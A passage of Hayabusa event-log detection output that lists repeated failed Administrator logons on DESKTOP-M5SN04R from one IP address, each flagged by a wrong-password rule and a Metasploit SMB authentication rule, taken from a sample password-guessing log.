Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvUzVoSLqFPAXSWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SMMgPu1VJIjAWPDW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1JjIa4nOKDTLuAD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0J0GJIm1UUXHH9QJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVX3xIz0hrQFvPr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nv4tKFEmHjiXkVDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdHHJl9LBek9pIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MWofwwLjwiyBk39P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dvsHFZe7Z1uJ9Dkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aDdgwvb1zsZF79k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQUb6CnMUtyrMNhF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP5OxHPsbLHnIUBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ysg903vYFhQHYvFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IySarHtsTvwSP56H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnUy8tbCIAVnmhDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bfBtc4MnMtPG6MpC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37b8MGIHY8QwXf9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDuaWikplDmJNmIE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kSSoAYJILHCPI7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9ikrtTGcZYU1556 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ypyd6SagvUXQHhtZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWS37lIJ3Q6ghgMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H211KmFImpBRwTGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64tO5iBehXQcNc49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xvxDngRj3j5TAwST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8VYRjMnxDgUTWYf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhWphTesbUf0hwi1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MO8VRRVANxIkDzEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ziSXANiDAf7LRFz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g0CvYYtyEcU2riBX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPg2LKgWMeM0Oqo0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbzL9T2d4RdeCz4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PeEfbWpoipfYtOKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RKJW1vSrIAbRTzyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aU4G8NBru22Vc4Cl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sacBcqxV97FUihrd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 41Ms0lEMeT0jYxYj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkQWVEHGM1NxowR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qKqRY7L2IQRoU57 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMIkvwbvqc9V6CFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PehzjCnK42ZPUE7e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fqw2GWiYfO0kU83 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFPJJNCFdPJl4igl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zc6CrAr7YoozKB6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHXminAIeV4ZJIK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06YmUCHNZqbaZMdZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fYoENCtP2uPy9xNh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 